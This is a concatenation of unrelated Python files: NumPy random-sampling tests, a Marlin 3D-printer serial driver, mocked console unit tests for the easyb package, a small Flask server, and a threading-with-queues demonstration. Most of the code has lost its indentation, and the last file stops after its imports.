assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.setSeed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = np.random.RandomState().poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = np.random.poisson
desired = np.array([1, 1, 0])
self.setSeed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = np.random.zipf
desired = np.array([2, 2, 1])
self.setSeed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = np.random.geometric
desired = np.array([2, 2, 2])
self.setSeed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = np.random.hypergeometric
desired = np.array([1, 1, 1])
self.setSeed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = np.random.logseries
desired = np.array([1, 1, 1])
self.setSeed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (np.random.exponential, np.random.standard_gamma,
np.random.chisquare, np.random.standard_t,
np.random.pareto, np.random.weibull,
np.random.power, np.random.rayleigh,
np.random.poisson, np.random.zipf,
np.random.geometric, np.random.logseries)
probfuncs = (np.random.geometric, np.random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (np.random.uniform, np.random.normal,
np.random.beta, np.random.gamma,
np.random.f, np.random.noncentral_chisquare,
np.random.vonmises, np.random.laplace,
np.random.gumbel, np.random.logistic,
np.random.lognormal, np.random.wald,
np.random.binomial, np.random.negative_binomial)
probfuncs = (np.random.binomial, np.random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
# TODO: Uncomment once randint can broadcast arguments
# def test_randint(self):
# itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
# np.int32, np.uint32, np.int64, np.uint64]
# func = np.random.randint
# high = np.array([1])
# low = np.array([0])
#
# for dt in itype:
# out = func(low, high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low[0], high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low, high[0], dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [np.random.noncentral_f, np.random.triangular,
np.random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
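# Illustrative sketch of the behaviour the class above verifies (not part of
# the original test suite): with the legacy np.random API, passing a
# single-element array as a distribution parameter broadcasts to a
# shape-(1,) sample instead of returning a scalar.
def _single_elt_broadcast_sketch():
    import numpy as np
    sample = np.random.normal(np.array([2]), np.array([3]))
    assert sample.shape == (1,)
    return sample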
|
printer.py
|
import os
import logging
from threading import Thread, Event, Lock
from time import sleep, time
import serial
# for python 2/3 compatibility
try:
reduce
except NameError:
# In python 3, reduce is no longer imported by default.
from functools import reduce
try:
isinstance("", basestring)
def is_str(s):
return isinstance(s, basestring)
def encode2To3(s):
return s
def decode2To3(s):
return s
except NameError:
def is_str(s):
return isinstance(s, str)
def encode2To3(s):
return bytes(s, 'UTF-8')
def decode2To3(s):
return s.decode('UTF-8')
HERE = os.path.dirname(os.path.abspath(__file__))
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
#logger.addHandler(logging.StreamHandler())
#fh = logging.FileHandler(os.path.join(HERE, 'voxelface.log'))
#fh.setFormatter(logging.Formatter('%(asctime)s - %(threadName)s - %(levelname)s - %(message)s'))
#logger.addHandler(fh)
class Printer(object):
""" The Printer object is responsible for serial communications with a
printer. The printer is expected to be running Marlin firmware.
"""
def __init__(self, port='/dev/tty.usbmodem1421', baudrate=250000):
# USB port and baudrate for communication with the printer.
self.port = port
self.baudrate = baudrate
# The Serial object that the printer is communicating on.
self.s = None
# List of the responses from the printer.
self.responses = []
# List of lines that were sent to the printer.
self.sentlines = []
# True if the print thread is alive and sending lines.
self.printing = False
# Set to True to pause the print.
self.paused = False
# If set to True, the read_thread will be closed as soon as possible.
self.stop_reading = False
# If set to True, the print_thread will be closed as soon as possible.
self.stop_printing = False
# List of all temperature string responses from the printer.
self.temp_readings = []
### Private Attributes ################################################
# List of all lines to be sent to the printer.
self._buffer = []
# Index into the _buffer of the next line to send to the printer.
self._current_line_idx = 0
# This thread continuously sends lines as they appear in self._buffer.
self._print_thread = None
# This thread continuously reads lines as they appear from the printer.
self._read_thread = None
# Flag used to synchronize the print_thread and the read_thread. An 'ok'
# needs to be returned for every line sent. When the print_thread sends
# a line this flag is cleared, and when an 'ok' is received it is set.
self._ok_received = Event()
self._ok_received.set()
# Lock used to ensure serial send/receive events are atomic with the
# setting/clearing of the `_ok_received` flag.
self._communication_lock = Lock()
# Lock used to ensure connecting and disconnecting is atomic.
self._connection_lock = Lock()
        # If False, the Printer instance does not own the serial object passed
        # in, so it should not be closed when we are finished with it.
self._owns_serial = True
# This is set to true when a disconnect was requested. If a sendline is
# called while this is true an error is raised.
self._disconnect_pending = False
# When we reset the line number Marlin's internal number will differ
# from our own _current_line_idx. This offset is used to keep those two
# in sync.
self._reset_offset = 0
### Printer Interface ###################################################
def connect(self, s=None):
""" Instantiate a Serial object using the stored port and baudrate.
Parameters
----------
s : serial.Serial
If a serial object is passed in then it will be used instead of
creating a new one.
"""
with self._connection_lock:
if s is None:
self.s = serial.Serial(self.port, self.baudrate, timeout=3)
else:
self.s = s
self._owns_serial = False
self._ok_received.set()
self._current_line_idx = 0
self._buffer = []
self.responses = []
self.sentlines = []
self._disconnect_pending = False
self._start_read_thread()
if s is None:
while len(self.responses) == 0:
                    sleep(0.01) # wait until the start message is received.
self.responses = []
logger.debug('Connected to {}'.format(self.s))
def disconnect(self, wait=False):
""" Disconnect from the printer by stopping threads and closing the port
Parameters
----------
wait : Bool (default: False)
If true, this method waits until all lines in the buffer have been
sent and acknowledged before disconnecting. Clearing the buffer
isn't guaranteed. If the read thread isn't running for some reason,
this function may return without waiting even when wait is set to
True.
"""
with self._connection_lock:
self._disconnect_pending = True
if wait:
buf_len = len(self._buffer)
while buf_len > len(self.responses) and \
self._is_read_thread_running():
sleep(0.01) # wait until all lines in the buffer are sent
if self._print_thread is not None:
self.stop_printing = True
if self.s is not None and self.s.writeTimeout is not None:
timeout = self.s.writeTimeout + 1
else:
timeout = 10
self._print_thread.join(timeout)
if self._read_thread is not None:
self.stop_reading = True
if self.s is not None and self.s.timeout is not None:
timeout = self.s.timeout + 1
else:
timeout = 10
self._read_thread.join(timeout)
if self.s is not None and self._owns_serial is True:
self.s.close()
self.s = None
self.printing = False
self._current_line_idx = 0
self._buffer = []
self.responses = []
self.sentlines = []
logger.debug('Disconnected from printer')
def load_file(self, filepath):
""" Load the given file into an internal _buffer. The lines will not be
send until `self._start_print_thread()` is called.
Parameters
----------
filepath : str
The path to a text file containing lines of GCode to be printed.
"""
lines = []
with open(filepath) as f:
for line in f:
line = line.strip()
if ';' in line: # clear out the comments
line = line.split(';')[0]
if line:
lines.append(line)
self._buffer.extend(lines)
def start(self):
""" Starts the read_thread and the _print_thread.
"""
self._start_read_thread()
self._start_print_thread()
def sendline(self, line):
""" Send the given line over serial by appending it to the send buffer
Parameters
----------
line : str
A line of GCode to send to the printer.
"""
if self._disconnect_pending:
msg = 'Attempted to send line after a disconnect was requested: {}'
raise RuntimeError(msg.format(line))
if line:
line = str(line).strip()
if ';' in line: # clear out the comments
line = line.split(';')[0]
if line:
self._buffer.append(line)
def get_response(self, line, timeout=0):
""" Send the given line and return the response from the printer.
Parameters
----------
line : str
The line to send to the printer
Returns
-------
r : str
The response from the printer.
"""
buf_len = len(self._buffer) + 1
self.sendline(line)
start_time = time()
while len(self.responses) != buf_len:
if len(self.responses) > buf_len:
msg = "Received more responses than lines sent"
raise RuntimeError(msg)
if timeout > 0 and (time() - start_time) > timeout:
return '' # return blank string on timeout.
if not self._is_read_thread_running():
raise RuntimeError("can't get response from serial since read thread isn't running")
sleep(0.01)
return self.responses[-1]
def current_position(self):
""" Get the current postion of the printer.
Returns
-------
pos : dict
Dict with keys of 'X', 'Y', 'Z', and 'E' and values of their
positions
"""
# example r: X:0.00 Y:0.00 Z:0.00 E:0.00 Count X: 0.00 Y:0.00 Z:0.00
r = self.get_response("M114")
r = r.split(' Count')[0].strip().split()
r = [x.split(':') for x in r]
pos = dict([(k, float(v)) for k, v in r])
return pos
def reset_linenumber(self, number = 0):
line = "M110 N{}".format(number)
self.sendline(line)
### Private Methods ######################################################
def _start_print_thread(self):
""" Spawns a new thread that will send all lines in the _buffer over
serial to the printer. This thread can be stopped by setting
`stop_printing` to True. If a print_thread already exists and is alive,
this method does nothing.
"""
if self._is_print_thread_running():
return
self.printing = True
self.stop_printing = False
self._print_thread = Thread(target=self._print_worker_entrypoint, name='Print')
self._print_thread.setDaemon(True)
self._print_thread.start()
logger.debug('print_thread started')
def _start_read_thread(self):
""" Spawns a new thread that will continuously read lines from the
printer. This thread can be stopped by setting `stop_reading` to True.
If a print_thread already exists and is alive, this method does
nothing.
"""
if self._is_read_thread_running():
return
self.stop_reading = False
self._read_thread = Thread(target=self._read_worker_entrypoint, name='Read')
self._read_thread.setDaemon(True)
self._read_thread.start()
logger.debug('read_thread started')
def _print_worker_entrypoint(self):
try:
self._print_worker()
except Exception as e:
logger.exception("Exception running print worker: " + str(e))
def _read_worker_entrypoint(self):
try:
self._read_worker()
except Exception as e:
logger.exception("Exception running read worker: " + str(e))
def _is_print_thread_running(self):
return self._print_thread is not None and self._print_thread.is_alive()
def _is_read_thread_running(self):
return self._read_thread is not None and self._read_thread.is_alive()
def _print_worker(self):
""" This method is spawned in the print thread. It loops over every line
in the _buffer and sends it over serial to the printer.
"""
while not self.stop_printing:
_paused = False
while self.paused is True and not self.stop_printing:
if _paused is False:
logger.debug('Printer.paused is True, waiting...')
_paused = True
sleep(0.01)
if _paused is True:
logger.debug('Printer.paused is now False, resuming.')
if self._current_line_idx < len(self._buffer):
self.printing = True
while not self._ok_received.is_set() and not self.stop_printing:
self._ok_received.wait(1)
line = self._next_line()
with self._communication_lock:
self.s.write(encode2To3(line))
self._ok_received.clear()
self._current_line_idx += 1
# Grab the just sent line without line numbers or checksum
plain_line = self._buffer[self._current_line_idx - 1].strip()
self.sentlines.append(plain_line)
else: # if there aren't new lines wait 10ms and check again
sleep(0.01)
self.printing = False
def _read_worker(self):
""" This method is spawned in the read thread. It continuously reads
from the printer over serial and checks for 'ok's.
"""
full_resp = ''
while not self.stop_reading:
if self.s is not None:
line = decode2To3(self.s.readline())
if line.startswith('Resend: '): # example line: "Resend: 143"
self._current_line_idx = int(line.split()[1]) - 1 + self._reset_offset
logger.debug('Resend Requested - {}'.format(line.strip()))
with self._communication_lock:
self._ok_received.set()
continue
if line.startswith('T:'):
self.temp_readings.append(line)
if line:
full_resp += line
# If there is no newline char in the response that means
# serial.readline() hit the timeout before a full line. This
# means communication has broken down so both threads need
# to be closed down.
if '\n' not in line:
self.printing = False
self.stop_printing = True
self.stop_reading = True
with self._communication_lock:
self._ok_received.set()
msg = """readline timed out mid-line.
last sentline: {}
response: {}
"""
raise RuntimeError(msg.format(self.sentlines[-1:],
full_resp))
if 'ok' in line:
with self._communication_lock:
self._ok_received.set()
self.responses.append(full_resp)
full_resp = ''
else: # if no printer is attached, wait 10ms to check again.
sleep(0.01)
def _next_line(self):
""" Prepares the next line to be sent to the printer by prepending the
line number and appending a checksum and newline character.
"""
line = self._buffer[self._current_line_idx].strip()
if line.startswith('M110 N'):
new_number = int(line[6:])
self._reset_offset = self._current_line_idx + 1 - new_number
elif line.startswith('M110'):
self._reset_offset = self._current_line_idx + 1
idx = self._current_line_idx + 1 - self._reset_offset
line = 'N{} {}'.format(idx, line)
checksum = self._checksum(line)
return '{}*{}\n'.format(line, checksum)
def _checksum(self, line):
""" Calclate the checksum by xor'ing all characters together.
"""
if not line:
raise RuntimeError("cannot compute checksum of an empty string")
return reduce(lambda a, b: a ^ b, [ord(char) for char in line])
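# Illustrative usage sketch for the Printer class above. The port, baudrate
# and G-code path are placeholders, not values from the original module, and
# a Marlin printer is assumed to be attached.
if __name__ == '__main__':
    printer = Printer(port='/dev/ttyACM0', baudrate=115200)
    printer.connect()                    # opens the serial port, starts the read thread
    printer.load_file('example.gcode')   # hypothetical file of G-code lines
    printer.start()                      # starts streaming the buffer to the printer
    print(printer.current_position())    # sends M114 and parses the reply
    printer.disconnect(wait=True)        # wait for the buffer to drain, then close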
|
__init__.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Copyright (C) 2017, Kai Raphahn <kai.raphahn@laburec.de>
#
import os
import time
import unittest
import unittest.mock as mock
from easyb.console import Console
from serial import SerialException
import threading
import easyb
from easyb.logging import SerialLogging
from tests.console.options import TestOptions
__all__ = [
"options",
"serial",
"TestConsole"
]
from tests.console.serial import TestserialPrepare11, TestserialRun1, TestserialClose1, TestserialRunContinuously
mock_serial = mock.Mock()
mock_serial_2 = mock.Mock()
old_logging = easyb.log
new_logging = SerialLogging()
new_logging.setup(app="Device", level=2)
cons = new_logging.get_writer("console")
cons.index.append("SERIAL")
# noinspection PyUnresolvedReferences
cons.add_style("SERIAL", "BRIGHT", "YELLOW", "")
cons.setup(text_space=15, error_index=["ERROR", "EXCEPTION"])
new_logging.register(cons)
new_logging.open()
# noinspection DuplicatedCode
class TestConsole(unittest.TestCase):
def setUp(self):
easyb.set_logging(new_logging)
return
def tearDown(self):
easyb.set_logging(old_logging)
return
def test_constructor(self):
console = Console()
self.assertIsNone(console.device)
self.assertIsNone(console.options)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_1(self):
option = TestOptions()
option.test_1()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertTrue(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_2(self):
"""tear down test.
"""
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (None, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_3(self):
"""tear down test.
"""
option = TestOptions()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_4(self):
"""tear down test.
"""
option = TestOptions()
option.test_2()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_5(self):
"""tear down test.
"""
option = TestOptions()
option.test_3()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_6(self):
"""tear down test.
"""
option = TestOptions()
option.test_4()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_7(self):
"""tear down test.
"""
option = TestOptions()
option.test_5()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_8(self):
"""tear down test.
"""
option = TestOptions()
option.test_6()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertTrue(check)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_prepare_9(self):
"""tear down test.
"""
option = TestOptions()
option.test_7()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial.open',
new=mock.Mock(side_effect=SerialException('Attempting to use a port that is not open')))
def test_prepare_10(self):
option = TestOptions()
option.test_1()
# mock_serial_2.open = mock.Mock(side_effect=SerialException('Attempting to use a port that is not open'))
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertFalse(check)
return
@mock.patch('easyb.device.Serial', new=TestserialPrepare11)
def test_prepare_11(self):
option = TestOptions()
option.test_8()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check = console.prepare()
self.assertTrue(check)
return
@mock.patch('easyb.device.Serial', new=TestserialPrepare11)
def test_list_commands_01(self):
option = TestOptions()
option.test_9()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
check2 = console.run()
check3 = console.close()
self.assertTrue(check1)
self.assertTrue(check2)
self.assertTrue(check3)
return
@mock.patch('easyb.device.Serial', new=TestserialPrepare11)
def test_list_commands_02(self):
option = TestOptions()
option.test_10()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
check2 = console.run()
check3 = console.close()
self.assertTrue(check1)
self.assertTrue(check2)
self.assertTrue(check3)
return
@mock.patch('easyb.device.Serial', new=TestserialPrepare11)
def test_list_commands_03(self):
option = TestOptions()
option.test_11()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
check2 = console.run()
check3 = console.close()
self.assertTrue(check1)
self.assertTrue(check2)
self.assertTrue(check3)
return
@mock.patch('easyb.device.Serial', new=TestserialRun1)
def test_run_1(self):
"""tear down test.
"""
option = TestOptions()
option.test_1()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
check2 = console.run()
self.assertTrue(check1)
self.assertTrue(check2)
return
@mock.patch('easyb.device.Serial', new=mock_serial)
def test_run_2(self):
"""tear down test.
"""
option = TestOptions()
option.test_6()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
check2 = console.run()
self.assertTrue(check1)
self.assertTrue(check2)
return
@mock.patch('easyb.device.Serial', new=TestserialClose1)
def test_close_1(self):
"""tear down test.
"""
option = TestOptions()
option.test_1()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
check2 = console.run()
check3 = console.close()
self.assertTrue(check1)
self.assertTrue(check2)
self.assertTrue(check3)
return
@mock.patch('easyb.device.Serial', new=TestserialRunContinuously)
def test_run_continuously_1(self):
"""tear down test.
"""
option = TestOptions()
option.test_12()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
thread = threading.Thread(target=console.run)
thread.start()
time.sleep(8)
console.device.abort = True
while True:
if console.device.active is False:
break
time.sleep(0.1)
check2 = console.device.status
console.device.serial.read_run = 0
console.device.serial.write_run = 0
console.device.serial.read_data = [
[0xfe, 0x33, 0xa4],
[0xff, 0x00, 0x28],
[0xfe, 0x65, 0x01],
[0x71, 0x00, 0x48, 0xf9, 0xed, 0xdb],
[0xfe, 0x75, 0x71],
[0x71, 0x00, 0x48, 0xf8, 0x61, 0x63]
]
check3 = console.close()
self.assertTrue(check1)
self.assertTrue(check2)
self.assertTrue(check3)
return
@mock.patch('easyb.device.Serial', new=TestserialRunContinuously)
def test_run_continuously_2(self):
"""tear down test.
"""
option = TestOptions()
option.test_12()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
thread = threading.Thread(target=console.run)
thread.start()
time.sleep(8)
console.device.abort = True
while True:
if console.device.active is False:
break
time.sleep(0.1)
check2 = console.device.status
console.device.serial.read_run = 0
console.device.serial.write_run = 0
console.device.serial.read_data = [
[0xfe, 0x33, 0xa4],
[0xff, 0x00, 0x28],
[0xfe, 0x0d, 0x1e],
[0x70, 0xf6, 0x91, 0xdf, 0xed, 0x0b],
[0xfe, 0x0d, 0x1e],
[0x70, 0xf6, 0x91, 0xdf, 0xed, 0x0b]
]
check3 = console.close()
self.assertTrue(check1)
self.assertTrue(check2)
self.assertFalse(check3)
return
@mock.patch('easyb.device.Serial', new=TestserialRunContinuously)
def test_run_continuously_3(self):
"""tear down test.
"""
option = TestOptions()
option.test_13()
console = Console()
console._parser = mock.Mock()
console._parser.parse_args = mock.Mock()
console._parser.parse_args.return_value = (option, None)
check1 = console.prepare()
thread = threading.Thread(target=console.run)
thread.start()
time.sleep(8)
console.device.abort = True
while True:
if console.device.active is False:
break
time.sleep(0.1)
check2 = console.device.status
console.device.serial.read_run = 0
console.device.serial.write_run = 0
console.device.serial.read_data = [
[0xfe, 0x33, 0xa4],
[0xff, 0x00, 0x28],
[0xfe, 0x65, 0x01],
[0x71, 0x00, 0x48, 0xf9, 0xed, 0xdb],
[0xfe, 0x75, 0x71],
[0x71, 0x00, 0x48, 0xf8, 0x61, 0x63]
]
check3 = console.close()
check4 = os.path.exists("TEST.xlsx")
self.assertTrue(check1)
self.assertTrue(check2)
self.assertTrue(check3)
self.assertTrue(check4)
return
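# Minimal standalone sketch (not part of the easyb suite) of the patching
# pattern used throughout this module: for the duration of the decorated test
# the named attribute is replaced by the mock, so the code under test never
# touches the real dependency. os.path.exists stands in for
# easyb.device.Serial purely for illustration.
class PatchingSketch(unittest.TestCase):
    @mock.patch('os.path.exists', new=mock.Mock(return_value=True))
    def test_dependency_is_replaced(self):
        self.assertTrue(os.path.exists('/definitely/not/a/real/path'))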
|
server.py
|
import sys
import os
from datetime import timedelta
import threading
curPath = os.path.abspath(os.path.dirname(__file__))
rootPath = os.path.split(curPath)[0]
sys.path.append(os.path.split(rootPath)[0])
from src.web.web_util.web_util import judge_pool, get_redis_conn, begin_check_redis
from flask import Flask, render_template, session
from src.web.controller.dataController import data, POOL_FLAG
from src.web.controller.spiderController import spider
from src.util.constant import WAITING_USER_LIST
from flask_cors import *
app = Flask(__name__)
CORS(app, supports_credentials=True)  # enable cross-origin requests (CORS)
app.config['SECRET_KEY'] = os.urandom(24)
app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(days=7)
host = judge_pool()
conn = get_redis_conn(host)
conn.delete(WAITING_USER_LIST)
@app.route('/')
def config():
session[POOL_FLAG] = judge_pool()
print("pool flag:", session.get(POOL_FLAG))
return render_template("config.html")
@app.route('/error')
def error():
return render_template("error.html")
@app.route('/cookie')
def cookie():
return render_template("cookie.html")
app.register_blueprint(spider, url_prefix='/spider')
app.register_blueprint(data, url_prefix='/data')
if __name__ == '__main__':
t = threading.Thread(target=begin_check_redis)
t.start()
app.run(host='0.0.0.0', port=5000, debug=False)
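# Minimal standalone sketch (names are illustrative, not from this project)
# of the blueprint pattern used above: routes declared on a Blueprint pick up
# the url_prefix given at registration, so '/ping' is served at '/api/ping'.
def _blueprint_sketch():
    from flask import Blueprint, Flask
    api = Blueprint('api', __name__)

    @api.route('/ping')
    def ping():
        return 'pong'
    demo_app = Flask('blueprint_sketch')
    demo_app.register_blueprint(api, url_prefix='/api')
    return demo_app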
|
withqueue.py
|
import threading, time, random, queue
##########################################################################################
# Fuzzing is a technique for amplifying race condition errors to make them more visible
FUZZ = True
def fuzz():
if FUZZ:
time.sleep(random.random())
###########################################################################################
counter = 0
counter_queue = queue.Queue()
def counter_manager():
'I have EXCLUSIVE rights to update the counter variable'
global counter
while True:
increment = counter_queue.get()
fuzz()
oldcnt = counter
fuzz()
counter = oldcnt + increment
fuzz()
fuzz()
counter_queue.task_done()
print_queue.put([
'The count is %d' % counter,
'---------------'])
t = threading.Thread(target=counter_manager)
t.daemon = True
t.start()
del t
###########################################################################################
print_queue = queue.Queue()
def print_manager():
    'I have EXCLUSIVE rights to call the "print" function'
while True:
job = print_queue.get()
fuzz()
for line in job:
print(line, end='')
fuzz()
print()
fuzz()
print_queue.task_done()
fuzz()
t = threading.Thread(target=print_manager)
t.daemon = True
t.start()
del t
###########################################################################################
def worker():
'My job is to increment the counter and print the current count'
counter_queue.put(1)
fuzz()
print_queue.put(['Starting up'])
fuzz()
worker_threads = []
for i in range(10):
t = threading.Thread(target=worker)
worker_threads.append(t)
t.start()
fuzz()
for t in worker_threads:
fuzz()
t.join()
counter_queue.join()
fuzz()
print_queue.put(['Finishing up'])
fuzz()
print_queue.join()
fuzz()
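# For contrast, a minimal sketch (not part of the original example) of the
# racy read-modify-write pattern the queues above are designed to avoid.
# Call racy_counter_demo() to watch increments get lost under interleaving.
def racy_counter_demo(n_threads=10):
    state = {'count': 0}
    def racy_worker():
        old = state['count']                # read
        time.sleep(random.random() * .01)   # widen the race window
        state['count'] = old + 1            # write back a possibly stale value
    threads = [threading.Thread(target=racy_worker) for _ in range(n_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    print('expected %d, got %d' % (n_threads, state['count']))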
|
worker.py
|
import logging
import queue
import threading
from time import sleep
